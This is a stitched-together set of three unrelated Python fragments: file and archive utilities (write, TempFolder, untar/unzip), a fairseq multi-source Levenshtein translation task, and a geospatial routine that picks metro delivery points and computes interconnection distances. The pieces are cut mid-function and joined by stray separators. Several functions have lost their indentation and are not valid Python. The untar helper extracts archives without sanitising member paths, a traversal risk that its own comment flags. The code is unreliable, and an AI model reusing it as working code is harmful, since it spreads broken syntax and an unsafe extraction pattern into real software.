        ext = str(source).lower().rpartition(".")[2]
    ext = SYS_INFO.platform_id.canonical_compress_extension(ext, short_form=True)
    if not ext:
        return abort(
            "Unknown extension '%s': can't decompress file" % os.path.basename(source),
            return_value=-1, fatal=fatal, logger=logger,
        )
    extractor = _unzip if ext == "zip" else _untar
    return _file_op(source, destination, extractor, overwrite, fatal, logger, dryrun, simplify=simplify)
class TempFolder:
    """Context manager for obtaining a temp folder"""
    def __init__(self, anchor=True, dryrun=UNSET, follow=True):
        """
        Args:
            anchor (bool): If True, short-ify paths relative to used temp folder
            dryrun (bool): Optionally override current dryrun setting
            follow (bool): If True, change working dir to temp folder (and restore)
        """
        self.anchor = anchor
        self.dryrun = dryrun
        self.follow = follow
        self.old_cwd = None  # cwd to restore on exit (only set when follow=True)
        self.tmp_folder = None  # real temp folder path; stays None in dryrun mode
    def __enter__(self):
        # set_dryrun() appears to return the previous setting, which we stash in
        # self.dryrun so __exit__ can restore it (swap trick)
        self.dryrun = _R.set_dryrun(self.dryrun)
        if not _R.is_dryrun():
            # Use realpath() to properly resolve for example symlinks on OSX temp paths
            self.tmp_folder = os.path.realpath(tempfile.mkdtemp())
            if self.follow:
                self.old_cwd = os.getcwd()
                os.chdir(self.tmp_folder)
        # In dryrun mode no folder is created; yield the symbolic placeholder
        tmp = self.tmp_folder or SYMBOLIC_TMP
        if self.anchor:
            Anchored.add(tmp)
        return tmp
    def __exit__(self, *_):
        # Restore the dryrun setting saved in __enter__
        _R.set_dryrun(self.dryrun)
        if self.anchor:
            Anchored.pop(self.tmp_folder or SYMBOLIC_TMP)
        if self.old_cwd:
            os.chdir(self.old_cwd)
        if self.tmp_folder:
            shutil.rmtree(self.tmp_folder, ignore_errors=True)
def touch(path, fatal=True, logger=UNSET, dryrun=UNSET):
    """Touch file with `path`

    Args:
        path (str | Path | None): Path to file to touch
        fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
        logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
        dryrun (bool): Optionally override current dryrun setting

    Returns:
        (int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
    """
    # A touch is just a write() with no contents
    return write(path, None, fatal=fatal, logger=logger, dryrun=dryrun)
def write(path, contents, fatal=True, logger=UNSET, dryrun=UNSET):
    """Write `contents` to file with `path`

    Args:
        path (str | Path | None): Path to file
        contents (str | bytes | None): Contents to write (only touch file if None)
        fatal (type | bool | None): True: abort execution on failure, False: don't abort but log, None: don't abort, don't log
        logger (callable | bool | None): Logger to use, True to print(), False to trace(), None to disable log chatter
        dryrun (bool): Optionally override current dryrun setting

    Returns:
        (int): In non-fatal mode, 1: successfully done, 0: was no-op, -1: failed
    """
    if not path:
        return 0
    path = resolved_path(path)
    byte_size = _R.represented_bytesize(len(contents)) if contents else ""
    def dryrun_msg():
        return "%s %s" % ("write %s to" % byte_size if byte_size else "touch", short(path))
    if _R.hdry(dryrun, logger, dryrun_msg):
        return 1
    ensure_folder(parent_folder(path), fatal=fatal, logger=None, dryrun=dryrun)
    try:
        if contents is None:
            # Touch: open in append mode so an existing file is NOT truncated
            # (previously this opened with "wt", wiping the file's contents),
            # then refresh its modification time
            with io.open(path, "ab"):
                pass
            os.utime(path, None)
        else:
            mode = "wb" if isinstance(contents, bytes) else "wt"
            with io.open(path, mode) as fh:
                fh.write(contents)
        _R.hlog(logger, "%s %s" % ("Wrote %s to" % byte_size if byte_size else "Touched", short(path)))
        return 1
    except Exception as e:
        return abort("Can't write to %s" % short(path), exc_info=e, return_value=-1, fatal=fatal, logger=logger)
def _copy(source, destination, ignore=None):
"""Effective copy"""
if os.path.isdir(source):
if os.path.isdir(destination):
for fname in os.listdir(source):
_copy(os.path.join(source, fname), os.path.join(destination, fname), ignore=ignore)
else:
if os.path.isfile(destination) or os.path.islink(destination):
os.unlink(destination)
shutil.copytree(source, destination, symlinks=True, ignore=ignore)
else:
shutil.copy(source, destination)
shutil.copystat(source, destination) # Make sure last modification time is preserved
def _do_delete(path, islink, fatal):
if islink or os.path.isfile(path):
os.unlink(path)
else:
shutil.rmtree(path, ignore_errors=not fatal)
def _move(source, destination):
    """Effective move"""
    # shutil.move transparently falls back to copy+delete across filesystems
    shutil.move(source, destination)
def _symlink(source, destination):
    """Effective symlink

    Creates `destination` pointing at `source`. When source lives under the
    destination's parent folder, the link is made relative so the tree can be
    moved/renamed without breaking it.
    """
    source = to_path(source)
    destination = to_path(destination)
    src = source.absolute()
    dest = destination.absolute()
    try:
        # Make relative symlinks automatically when applicable.
        # The previous check `str(src.parent).startswith(str(dest.parent))` was a
        # plain string-prefix test, which wrongly matched sibling folders such as
        # "/a/bc" vs "/a/b" and then crashed in relative_to(); let relative_to()
        # itself decide instead.
        source = src.relative_to(dest.parent)
    except ValueError:
        pass
    os.symlink(source, destination)
def _tar(source, destination, arcname, mode):
    """Effective tar"""
    import tarfile
    source = to_path(source)
    # Remove any pre-existing archive first (best effort, never dryrun here)
    delete(destination, fatal=False, logger=None, dryrun=False)
    # `mode` is e.g. "w:" or "w:gz", as prepared by compress()
    with tarfile.open(destination, mode=mode) as fh:
        fh.add(source, arcname=arcname, recursive=True)
def _move_extracted(extracted_source, destination, simplify):
    # Tarballs often contain only one sub-folder, auto-unpack that to the destination (similar to how zip files work)
    if simplify:
        contents = list(ls_dir(extracted_source))
        if len(contents) == 1 and contents[0].is_dir():
            extracted_source = contents[0]
    delete(destination, fatal=False, logger=None, dryrun=False)
    _move(extracted_source, destination)
def _untar(source, destination, simplify):
    """Effective untar"""
    import tarfile
    source = to_path(source).absolute()
    destination = to_path(destination).absolute()
    # Extract into a temp folder first, then move the result into place
    with TempFolder():
        extracted_source = to_path(source.name)
        with tarfile.open(source) as fh:
            # NOTE(review): extractall() without member sanitization trusts the
            # archive; a malicious tar with "../" members could escape the temp
            # folder -- confirm inputs are trusted (see tarfile extraction filters)
            fh.extractall(extracted_source)
        _move_extracted(extracted_source, destination, simplify)
def _unzip(source, destination, simplify):
    """Effective unzip"""
    from zipfile import ZipFile
    source = to_path(source).absolute()
    destination = to_path(destination).absolute()
    # Extract into a temp folder first, then move the result into place
    with TempFolder():
        extracted_source = to_path(source.name)
        with ZipFile(source) as fh:
            fh.extractall(extracted_source)
        _move_extracted(extracted_source, destination, simplify)
def _zip(source, destination, arcname, fh=None):
    """Effective zip, behaving like tar+gzip for consistency"""
    if fh is None:
        # Top-level call: open the archive, then recurse with the open handle
        from zipfile import ZipFile, ZIP_DEFLATED
        source = to_path(source).absolute()
        destination = to_path(destination).absolute()
        with ZipFile(destination, mode="w", compression=ZIP_DEFLATED) as zf:
            _zip(source, destination, arcname, fh=zf)
    elif source.is_dir():
        # Recurse into folders, extending the archive-internal path as we go
        for entry in source.iterdir():
            _zip(entry, destination, arcname / entry.name, fh=fh)
    else:
        fh.write(source, arcname=arcname)
def _file_op(source, destination, func, overwrite, fatal, logger, dryrun, must_exist=True, ignore=None, **extra):
"""Call func(source, destination)
| |
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from dataclasses import dataclass, field
import torch
from fairseq import utils
from fairseq.dataclass import ChoiceEnum
from fairseq.tasks import register_task
from fairseq.tasks.translation import TranslationConfig, TranslationTask
from fairseq.utils import new_arange
from fairseq.data import (
AppendTokenDataset,
ConcatDataset,
LanguageMultiSourceDataset,
PrependTokenDataset,
StripTokenDataset,
TruncateDataset,
data_utils,
indexed_dataset,
FairseqDataset,
iterators,
)
import logging
import os
import itertools
logger = logging.getLogger(__name__)
# Valid values for the `noise` option of TranslationMultiLevenshteinConfig
NOISE_CHOICES = ChoiceEnum(["random_delete", "random_mask", "no_noise"])
@dataclass
class TranslationMultiLevenshteinConfig(TranslationConfig):
    """Translation config extended with noise injection and retrieval settings
    for the `multi_translation_lev` task."""
    # How target sequences are corrupted during training (see inject_noise)
    noise: NOISE_CHOICES = field(
        default="random_delete", metadata={"help": "type of noise"},
    )
    # How many retrieved target-side sequences are loaded per example
    num_retrieved: int = field(
        default=1,
        metadata={"help": "number of co-edited sequences from the monoling corpus"},
    )
    # Forwarded to filter_indices_by_size when building batch iterators
    max_acceptable_retrieved_ratio: float = field(
        default=1.2,
        metadata={
            "help": "Maximum authorized ratio between retrieved examples and target"
        },
    )
def load_lang_multi_dataset(
    data_path,
    split,
    src,
    src_dict,
    tgt,
    tgt_dict,
    num_multi_src,
    combine,
    dataset_impl,
    upsample_primary,
    left_pad_source,
    left_pad_target,
    max_source_positions,
    max_target_positions,
    prepend_bos=False,
    load_alignments=False,
    truncate_source=False,
    append_source_id=False,
    num_buckets=0,
    shuffle=True,
    pad_to_multiple=1,
    prepend_bos_src=None,
):
    """Load a parallel src/tgt split plus `num_multi_src` retrieved target-side
    datasets (files named ``{split}.{src}-{tgt}.{tgt}{n}``), wrapped in a
    LanguageMultiSourceDataset.

    Mirrors fairseq's load_langpair_dataset: optional sharded splits
    (``train``, ``train1``, ...) are concatenated when `combine` is True, and
    the same bos-prepend / lang-id-append / truncation transforms are applied
    to the retrieved datasets as to the target.
    """
    def split_exists(split, src, tgt, lang, data_path):
        # A split exists when the indexed dataset file for `lang` is present
        filename = os.path.join(data_path, "{}.{}-{}.{}".format(split, src, tgt, lang))
        return indexed_dataset.dataset_exists(filename, impl=dataset_impl)

    src_datasets = []
    tgt_datasets = []
    multi_src_datasets = []  # one list of shards per retrieved dataset
    for n in range(num_multi_src):
        multi_src_datasets.append([])
    # Iterate over shards: "train", "train1", "train2", ... until one is missing
    for k in itertools.count():
        split_k = split + (str(k) if k > 0 else "")
        # infer langcode
        if split_exists(split_k, src, tgt, src, data_path):
            prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, src, tgt))
        elif split_exists(split_k, tgt, src, src, data_path):
            prefix = os.path.join(data_path, "{}.{}-{}.".format(split_k, tgt, src))
        else:
            if k > 0:
                break
            else:
                raise FileNotFoundError(
                    "Dataset not found: {} ({})".format(split, data_path)
                )
        # Every retrieved dataset (tgt1, tgt2, ...) must exist for this shard
        for n in range(num_multi_src):
            dir1 = split_exists(split_k, src, tgt, tgt + str(n + 1), data_path)
            dir2 = split_exists(split_k, tgt, src, tgt + str(n + 1), data_path)
            if not (dir1 or dir2):
                raise FileNotFoundError(
                    "Retrieval dataset #{} not found: {} ({})".format(
                        n + 1, split, data_path
                    )
                )
        src_dataset = data_utils.load_indexed_dataset(
            prefix + src, src_dict, dataset_impl
        )
        if truncate_source:
            # Strip eos, truncate to the size budget, then re-append eos
            src_dataset = AppendTokenDataset(
                TruncateDataset(
                    StripTokenDataset(src_dataset, src_dict.eos()),
                    max_source_positions - 1,
                ),
                src_dict.eos(),
            )
        src_datasets.append(src_dataset)
        tgt_dataset = data_utils.load_indexed_dataset(
            prefix + tgt, tgt_dict, dataset_impl
        )
        if tgt_dataset is not None:
            tgt_datasets.append(tgt_dataset)
        # Retrieved sequences live on the target side and use tgt_dict
        for n in range(num_multi_src):
            single_src_dataset = data_utils.load_indexed_dataset(
                prefix + tgt + str(n + 1), tgt_dict, dataset_impl
            )
            if single_src_dataset is not None:
                multi_src_datasets[n].append(single_src_dataset)
        logger.info(
            "{} {} {}-{} {} examples".format(
                data_path, split_k, src, tgt, len(src_datasets[-1])
            )
        )
        if not combine:
            break
    assert len(src_datasets) == len(tgt_datasets) or len(tgt_datasets) == 0
    if len(src_datasets) == 1:
        src_dataset = src_datasets[0]
        tgt_dataset = tgt_datasets[0] if len(tgt_datasets) > 0 else None
        for n in range(num_multi_src):
            multi_src_datasets[n] = (
                multi_src_datasets[n][0] if len(multi_src_datasets[n]) > 0 else None
            )
    else:
        # Several shards: concatenate, upsampling only the primary (first) one
        sample_ratios = [1] * len(src_datasets)
        sample_ratios[0] = upsample_primary
        src_dataset = ConcatDataset(src_datasets, sample_ratios)
        if len(tgt_datasets) > 0:
            tgt_dataset = ConcatDataset(tgt_datasets, sample_ratios)
        else:
            tgt_dataset = None
        # NOTE(review): unlike tgt, this does not guard against an empty shard
        # list for the retrieved datasets -- confirm they always load
        for n in range(num_multi_src):
            multi_src_datasets[n] = ConcatDataset(multi_src_datasets[n], sample_ratios)
    if prepend_bos:
        assert hasattr(src_dict, "bos_index") and hasattr(tgt_dict, "bos_index")
        src_dataset = PrependTokenDataset(src_dataset, src_dict.bos())
        if tgt_dataset is not None:
            tgt_dataset = PrependTokenDataset(tgt_dataset, tgt_dict.bos())
        # multi_src_datasets is always a list here; the None check is a no-op guard
        if multi_src_datasets is not None:
            for n in range(num_multi_src):
                if multi_src_datasets[n] is not None:
                    multi_src_datasets[n] = PrependTokenDataset(
                        multi_src_datasets[n], tgt_dict.bos()
                    )
    elif prepend_bos_src is not None:
        logger.info(f"prepending src bos: {prepend_bos_src}")
        src_dataset = PrependTokenDataset(src_dataset, prepend_bos_src)
    eos = None
    if append_source_id:
        # Append language-id tokens like "[en]" so the model can tell languages apart
        src_dataset = AppendTokenDataset(
            src_dataset, src_dict.index("[{}]".format(src))
        )
        if tgt_dataset is not None:
            tgt_dataset = AppendTokenDataset(
                tgt_dataset, tgt_dict.index("[{}]".format(tgt))
            )
        if multi_src_datasets is not None:
            for n in range(num_multi_src):
                if multi_src_datasets[n] is not None:
                    multi_src_datasets[n] = AppendTokenDataset(
                        multi_src_datasets[n], tgt_dict.index("[{}]".format(tgt))
                    )
        eos = tgt_dict.index("[{}]".format(tgt))
    align_dataset = None
    if load_alignments:
        align_path = os.path.join(data_path, "{}.align.{}-{}".format(split, src, tgt))
        if indexed_dataset.dataset_exists(align_path, impl=dataset_impl):
            align_dataset = data_utils.load_indexed_dataset(
                align_path, None, dataset_impl
            )
    tgt_dataset_sizes = tgt_dataset.sizes if tgt_dataset is not None else None
    multi_src_sizes = [
        single.sizes if single is not None else None for single in multi_src_datasets
    ]
    return LanguageMultiSourceDataset(
        src_dataset,
        src_dataset.sizes,
        src_dict,
        multi_src_datasets,
        multi_src_sizes,
        tgt_dataset,
        tgt_dataset_sizes,
        tgt_dict,
        left_pad_source=left_pad_source,
        left_pad_target=left_pad_target,
        align_dataset=align_dataset,
        eos=eos,
        num_buckets=num_buckets,
        shuffle=shuffle,
        pad_to_multiple=pad_to_multiple,
    )
@register_task("multi_translation_lev", dataclass=TranslationMultiLevenshteinConfig)
class TranslationMultiLevenshteinTask(TranslationTask):
"""
Translation (Sequence Generation) task for Levenshtein Transformer
See `"Levenshtein Transformer" <https://arxiv.org/abs/1905.11006>`_.
"""
cfg: TranslationMultiLevenshteinConfig
# @staticmethod
# def add_args(parser):
# TranslationTask.add_args(parser)
# parser.add_argument(
# "--num-retrieved",
# default=3,
# type=int,
# help="Number of sentences retrieved, then edited together to form the final sentence",
# )
tokenizer = None
def load_dataset(self, split, epoch=1, combine=False, **kwargs):
"""Load a given dataset split.
Args:
split (str): name of the split (e.g., train, valid, test)
"""
paths = utils.split_paths(self.cfg.data)
assert len(paths) > 0
data_path = paths[(epoch - 1) % len(paths)]
# infer langcode
src, tgt = self.cfg.source_lang, self.cfg.target_lang
self.datasets[split] = load_lang_multi_dataset(
data_path,
split,
src,
self.src_dict,
tgt,
self.tgt_dict,
self.cfg.num_retrieved,
combine=combine,
dataset_impl=self.cfg.dataset_impl,
upsample_primary=self.cfg.upsample_primary,
left_pad_source=self.cfg.left_pad_source,
left_pad_target=self.cfg.left_pad_target,
max_source_positions=self.cfg.max_source_positions,
max_target_positions=self.cfg.max_target_positions,
prepend_bos=True,
)
    def get_batch_iterator(
        self,
        dataset,
        max_tokens=None,
        max_sentences=None,
        max_positions=None,
        ignore_invalid_inputs=False,
        required_batch_size_multiple=1,
        seed=1,
        num_shards=1,
        shard_id=0,
        num_workers=0,
        epoch=1,
        data_buffer_size=0,
        disable_iterator_cache=False,
    ):
        """
        Get an iterator that yields batches of data from the given dataset.

        Args:
            dataset (~fairseq.data.FairseqDataset): dataset to batch
            max_tokens (int, optional): max number of tokens in each batch
                (default: None).
            max_sentences (int, optional): max number of sentences in each
                batch (default: None).
            max_positions (optional): max sentence length supported by the
                model (default: None).
            ignore_invalid_inputs (bool, optional): don't raise Exception for
                sentences that are too long (default: False).
            required_batch_size_multiple (int, optional): require batch size to
                be a multiple of N (default: 1).
            seed (int, optional): seed for random number generator for
                reproducibility (default: 1).
            num_shards (int, optional): shard the data iterator into N
                shards (default: 1).
            shard_id (int, optional): which shard of the data iterator to
                return (default: 0).
            num_workers (int, optional): how many subprocesses to use for data
                loading. 0 means the data will be loaded in the main process
                (default: 0).
            epoch (int, optional): the epoch to start the iterator from
                (default: 1).
            data_buffer_size (int, optional): number of batches to
                preload (default: 0).
            disable_iterator_cache (bool, optional): don't cache the
                EpochBatchIterator (ignores `FairseqTask::can_reuse_epoch_itr`)
                (default: False).

        Returns:
            ~fairseq.iterators.EpochBatchIterator: a batched iterator over the
            given dataset split
        """
        # Reuse a cached iterator when allowed (avoids re-batching every epoch)
        can_reuse_epoch_itr = not disable_iterator_cache and self.can_reuse_epoch_itr(
            dataset
        )
        if can_reuse_epoch_itr and dataset in self.dataset_to_epoch_iter:
            logger.debug("reusing EpochBatchIterator for epoch {}".format(epoch))
            return self.dataset_to_epoch_iter[dataset]
        assert isinstance(dataset, FairseqDataset)
        # initialize the dataset with the correct starting epoch
        dataset.set_epoch(epoch)
        # get indices ordered by example size
        with data_utils.numpy_seed(seed):
            indices = dataset.ordered_indices()
        # filter examples that are too large
        # NOTE(review): max_acceptable_retrieved_ratio is an extra kwarg not in
        # the base fairseq signature -- filter_indices_by_size must be overridden
        # somewhere to accept it; confirm
        if max_positions is not None:
            indices = self.filter_indices_by_size(
                indices,
                dataset,
                max_positions,
                ignore_invalid_inputs,
                max_acceptable_retrieved_ratio=self.cfg.max_acceptable_retrieved_ratio,
            )
        # create mini-batches with given size constraints
        batch_sampler = dataset.batch_by_size(
            indices,
            max_tokens=max_tokens,
            max_sentences=max_sentences,
            required_batch_size_multiple=required_batch_size_multiple,
        )
        # return a reusable, sharded iterator
        epoch_iter = iterators.EpochBatchIterator(
            dataset=dataset,
            collate_fn=dataset.collater,
            batch_sampler=batch_sampler,
            seed=seed,
            num_shards=num_shards,
            shard_id=shard_id,
            num_workers=num_workers,
            epoch=epoch,
            buffer_size=data_buffer_size,
        )
        if can_reuse_epoch_itr:
            self.dataset_to_epoch_iter[dataset] = epoch_iter
        return epoch_iter
    def inject_noise(self, target_tokens):
        """Return a corrupted copy of `target_tokens`, per self.cfg.noise.

        The corrupted sequences serve as the decoder's starting point when
        training Levenshtein-style refinement models.
        """
        def _random_delete(target_tokens):
            # Delete a random fraction of tokens from each sequence,
            # always keeping <bos> and <eos>
            pad = self.tgt_dict.pad()
            bos = self.tgt_dict.bos()
            eos = self.tgt_dict.eos()
            max_len = target_tokens.size(1)
            target_mask = target_tokens.eq(pad)
            # Random per-token scores; bos/eos forced to 0 (sorted first, kept),
            # pad forced to 1 (sorted last)
            target_score = target_tokens.clone().float().uniform_()
            target_score.masked_fill_(
                target_tokens.eq(bos) | target_tokens.eq(eos), 0.0
            )
            target_score.masked_fill_(target_mask, 1)
            target_score, target_rank = target_score.sort(1)
            # Number of non-pad tokens per sequence
            target_length = target_mask.size(1) - target_mask.float().sum(
                1, keepdim=True
            )
            # do not delete <bos> and <eos> (we assign 0 score for them)
            target_cutoff = (
                2
                + (
                    (target_length - 2)
                    * target_score.new_zeros(target_score.size(0), 1).uniform_()
                ).long()
            )
            # Tokens whose sorted rank falls at/after the cutoff get deleted
            target_cutoff = target_score.sort(1)[1] >= target_cutoff
            # Blank the cut tokens to pad, then gather survivors back into
            # their original left-to-right order
            prev_target_tokens = (
                target_tokens.gather(1, target_rank)
                .masked_fill_(target_cutoff, pad)
                .gather(1, target_rank.masked_fill_(target_cutoff, max_len).sort(1)[1])
            )
            # Trim trailing columns that are now entirely padding
            prev_target_tokens = prev_target_tokens[
                :, : prev_target_tokens.ne(pad).sum(1).max()
            ]
            return prev_target_tokens
        def _random_mask(target_tokens):
            # Replace a random number (>= 1) of maskable tokens with <unk>
            pad = self.tgt_dict.pad()
            bos = self.tgt_dict.bos()
            eos = self.tgt_dict.eos()
            unk = self.tgt_dict.unk()
            # Maskable positions: everything except pad/bos/eos
            target_masks = (
                target_tokens.ne(pad) & target_tokens.ne(bos) & target_tokens.ne(eos)
            )
            target_score = target_tokens.clone().float().uniform_()
            target_score.masked_fill_(~target_masks, 2.0)
            target_length = target_masks.sum(1).float()
            target_length = target_length * target_length.clone().uniform_()
            target_length = target_length + 1  # make sure to mask at least one token.
            _, target_rank = target_score.sort(1)
            # The `target_length` lowest-scoring positions are selected...
            target_cutoff = new_arange(target_rank) < target_length[:, None].long()
            # ...then scattered back to their original positions and replaced
            prev_target_tokens = target_tokens.masked_fill(
                target_cutoff.scatter(1, target_rank, target_cutoff), unk
            )
            return prev_target_tokens
        def _full_mask(target_tokens):
            # Replace every real token with <unk>, keeping only pad/bos/eos.
            # NOTE(review): currently unreachable -- "full_mask" is not one of
            # NOISE_CHOICES and is never dispatched below
            pad = self.tgt_dict.pad()
            bos = self.tgt_dict.bos()
            eos = self.tgt_dict.eos()
            unk = self.tgt_dict.unk()
            target_mask = (
                target_tokens.eq(bos) | target_tokens.eq(eos) | target_tokens.eq(pad)
            )
            return target_tokens.masked_fill(~target_mask, unk)
        if self.cfg.noise == "random_delete":
            return _random_delete(target_tokens)
        elif self.cfg.noise == "random_mask":
            return _random_mask(target_tokens)
        elif self.cfg.noise == "no_noise":
            return target_tokens
        else:
            raise NotImplementedError
    def build_generator(self, models, args, **unused):
        # add models input to match the API for SequenceGenerator
        from fairseq.iterative_refinement_generator import IterativeRefinementGenerator
        # from fairseq.sequence_generator import SequenceGenerator
        # NOTE: max_iter is hard-coded to 1 (a single refinement pass),
        # regardless of any iter_decode_* command-line arguments
        return IterativeRefinementGenerator(
            self.target_dictionary,
            beam_size=getattr(args, "decode_with_beam", 1),
            eos_penalty=getattr(args, "decode_eos_penalty", 0.0),
            max_ratio=getattr(args, "decode_max_ratio", None),
            max_iter=1,
        )
def build_dataset_for_inference(
self,
src_tokens,
src_lengths,
multi_src_tokens,
multi_src_sizes,
constraints=None,
):
if constraints is not None:
# | |
(not IPM regions), by default None
remove_ny_z_j : bool, optional
If the IPM region NY_Z_J (NYC) should be removed, by default False
    Returns
    -------
    gpd.GeoDataFrame
        Selected metro areas (the largest qualifying cities per IPM region,
        plus any user-specified additions), with "latitude" and "longitude"
        columns added
"""
_metro_areas_gdf = metro_areas_gdf.copy()
_metro_areas_gdf["geometry"] = _metro_areas_gdf["center"]
# metro_ipm_gdf = gpd.sjoin(ipm_gdf, _metro_areas_gdf, how="left", op="intersects")
metro_ipm_gdf = gpd.sjoin(ipm_gdf, _metro_areas_gdf, how="left", op="contains")
    # Don't put Sacramento in CALN because it is also in BANC
metro_ipm_gdf = metro_ipm_gdf.loc[
~(
(metro_ipm_gdf["metro_id"] == "40900")
& (metro_ipm_gdf["IPM_Region"] == "WEC_CALN")
),
:,
]
# Set population of Cheyenne, WY to 800k to force it as the major city in WECC_WY.
# Otherwise Rapid City, SD is the largest city in WECC_WY, and we believe it should
# not be the delivery point for this region.
metro_ipm_gdf.loc[metro_ipm_gdf["cbsa_id"] == "16940", "population"] = 800000
df_list = []
grouped = metro_ipm_gdf.groupby("IPM_Region", as_index=False)
for _, _df in grouped:
n_df = _df.loc[_df["population"] >= min_population, :]
if max_cities_per_region:
n_df = n_df.nlargest(max_cities_per_region, "population")
# If there aren't any city that meet population criteria keep the largest city
if n_df.empty:
n_df = _df.nlargest(1, "population")
df_list.append(n_df)
largest_cities = pd.concat(df_list, ignore_index=True)
if additional_metros:
user_metros = metro_ipm_gdf.query("metro_id in @additional_metros")
largest_cities = pd.concat([largest_cities, user_metros], ignore_index=True)
lats = [center.y for center in largest_cities.center]
lons = [center.x for center in largest_cities.center]
largest_cities["latitude"] = lats
largest_cities["longitude"] = lons
extra_pjm_location_data = {
"IPM_Region": ["PJM_NJLand"],
"metro_id": ["substation_143941"],
"name": ["<NAME>, NJ"],
"state": ["NJ"],
"longitude": [-74.48014],
"latitude": [40.45829],
"center": [Point(-74.48014, 40.45829)],
}
largest_cities = largest_cities.append(
gpd.GeoDataFrame(
extra_pjm_location_data,
geometry=[Point(-74.48014, 40.45829)],
crs="EPSG:4326",
), ignore_index=True
)
if remove_ny_z_j:
largest_cities = largest_cities.loc[
largest_cities["metro_id"] != "NY_Z_J", :
].reset_index(drop=True)
return largest_cities
def cartesian(latitude, longitude, elevation=0):
    "https://www.timvink.nl/closest-coordinates/"
    # Work in radians; note `elevation` is currently unused (radius is fixed)
    lat_rad = latitude * (math.pi / 180)
    lon_rad = longitude * (math.pi / 180)
    R = 6371  # 6378137.0 + elevation # relative to centre of the earth
    x = R * math.cos(lat_rad) * math.cos(lon_rad)
    y = R * math.cos(lat_rad) * math.sin(lon_rad)
    z = R * math.sin(lat_rad)
    return (x, y, z)
def ckdnearest(gdA, gdB):
    """For each row of ``gdA``, find the nearest row of ``gdB``.

    Adapted from https://gis.stackexchange.com/a/301935. ``gdA`` must have
    "Latitude"/"Longitude" columns; ``gdB`` must have "latitude"/"longitude"
    columns. Returns one row per ``gdA`` row: the columns of both frames
    (matched ``gdB`` coordinates renamed to "lat2"/"lon2", its "geometry"
    column dropped) plus a "dist_mile" haversine-distance column.

    BUGFIX: the previous version renamed ``gdB``'s columns with
    ``inplace=True``, silently mutating the caller's dataframe; the rename
    is now done on a copy so callers no longer need to pass defensive copies.
    """
    # Nearest-neighbor search on 3-D Cartesian coordinates so the KD-tree
    # query is not distorted by treating lat/lon as planar coordinates.
    coords_a = [
        cartesian(row["Latitude"], row["Longitude"]) for _, row in gdA.iterrows()
    ]
    coords_b = [
        cartesian(row["latitude"], row["longitude"]) for _, row in gdB.iterrows()
    ]
    btree = cKDTree(coords_b)
    _, idx = btree.query(coords_a, k=1)
    # Rename on a copy -- do not mutate the caller's gdB.
    gdB = gdB.rename(columns={"latitude": "lat2", "longitude": "lon2"})
    gdf = pd.concat(
        [
            gdA.reset_index(drop=True),
            gdB.loc[idx, gdB.columns != "geometry"].reset_index(drop=True),
        ],
        axis=1,
    )
    # Great-circle distance (miles) between each gdA point and its match.
    gdf["dist_mile"] = gdf.apply(
        lambda row: haversine(
            row["Longitude"], row["Latitude"], row["lon2"], row["lat2"], units="mile"
        ),
        axis=1,
    )
    return gdf
def wa_capex(nearest_df):
    """Return the area-weighted average interconnection capex.

    Averages the "interconnect_capex" column of ``nearest_df`` using the
    "km2" column as weights.
    """
    weighted_average = np.average(
        nearest_df["interconnect_capex"], weights=nearest_df["km2"]
    )
    return weighted_average
def label_site_region(gdf, id_col, lat, lon):
    """Label each (lat, lon) point with the ``id_col`` value of the polygon
    in ``gdf`` that contains it.

    Points not contained by any polygon are left as NaN in the returned
    Series; if polygons overlap, the last matching row of ``gdf`` wins.
    """
    labels = pd.Series(index=range(len(lat)), dtype=str)
    for row_idx in gdf.index:
        geom = gdf["geometry"][row_idx]
        inside = shapely.vectorized.contains(geom, lon, lat)
        labels[inside] = gdf[id_col][row_idx]
    return labels
def calc_interconnect_distances(
    site_gdf, substation_gdf, metro_gdf, site_id_col="cpa_id"
):
    """Calculate spur/transmission distances for every candidate site.

    Three nearest-neighbor distances are computed with ``ckdnearest``
    (haversine miles): site -> nearest substation, that substation -> its
    nearest metro, and site -> nearest metro directly.

    Parameters
    ----------
    site_gdf : GeoDataFrame
        Candidate sites; must have "Latitude"/"Longitude" columns and a
        unique ``site_id_col`` column.
    substation_gdf : GeoDataFrame
        Substations with "latitude"/"longitude", "substation_id", and
        "substation_state" columns.
    metro_gdf : GeoDataFrame
        Metro delivery points with "latitude"/"longitude", "metro_id",
        "state", and "IPM_Region" columns.
    site_id_col : str, optional
        Name of the unique site identifier column (default "cpa_id").

    Returns
    -------
    DataFrame
        One row per site (from the site->substation match) with added columns
        "site_substation_spur_miles", "substation_metro_tx_miles",
        "substation_nearest_metro", "site_metro_spur_miles", and
        "site_nearest_metro".
    """
    # Substation to nearest metro. Delaware substations are matched only
    # against non-NJ metros; all other substations may match any metro.
    # NOTE(review): the rationale for the DE/NJ exclusion is not visible in
    # this function -- confirm against the region definitions.
    _substation_gdf = substation_gdf.rename(
        columns={"latitude": "Latitude", "longitude": "Longitude"}
    )
    nearest_substation_metro = ckdnearest(
        _substation_gdf.query("substation_state != 'DE'"),
        metro_gdf.reset_index(drop=True),
    )
    nearest_substation_metro_de = ckdnearest(
        _substation_gdf.query("substation_state == 'DE'"),
        metro_gdf.query("state != 'NJ'").reset_index(drop=True),
    )
    nearest_substation_metro_all = pd.concat(
        [nearest_substation_metro, nearest_substation_metro_de], ignore_index=True
    )
    nearest_substation_metro_all = nearest_substation_metro_all.rename(
        columns={"dist_mile": "substation_metro_tx_miles"}
    )
    # NOTE(review): this branch looks like dead/debug code -- it only fires
    # when "latitude" is absent, yet the rename it performs targets
    # "latitude" and so does nothing in that case.
    if "latitude" not in substation_gdf.columns:
        print("lowercase lat isn't in substation_gdf")
        substation_gdf = substation_gdf.rename(
            columns={"latitude": "Latitude", "longitude": "Longitude"}
        )
    # Site to nearest substation
    nearest_site_substation = ckdnearest(
        site_gdf.reset_index(drop=True),
        substation_gdf.reset_index(drop=True)
    )
    nearest_site_substation = nearest_site_substation.rename(
        columns={"dist_mile": "site_substation_spur_miles"}
    )
    # Site to nearest metro (direct spur line). IPM_Region is dropped so the
    # site's own region column is not duplicated in the concat output.
    nearest_site_metro = ckdnearest(
        site_gdf.reset_index(drop=True),
        metro_gdf.drop(columns=["IPM_Region"]).reset_index(drop=True),
    )
    nearest_site_metro = nearest_site_metro.rename(
        columns={"dist_mile": "site_metro_spur_miles"}
    )
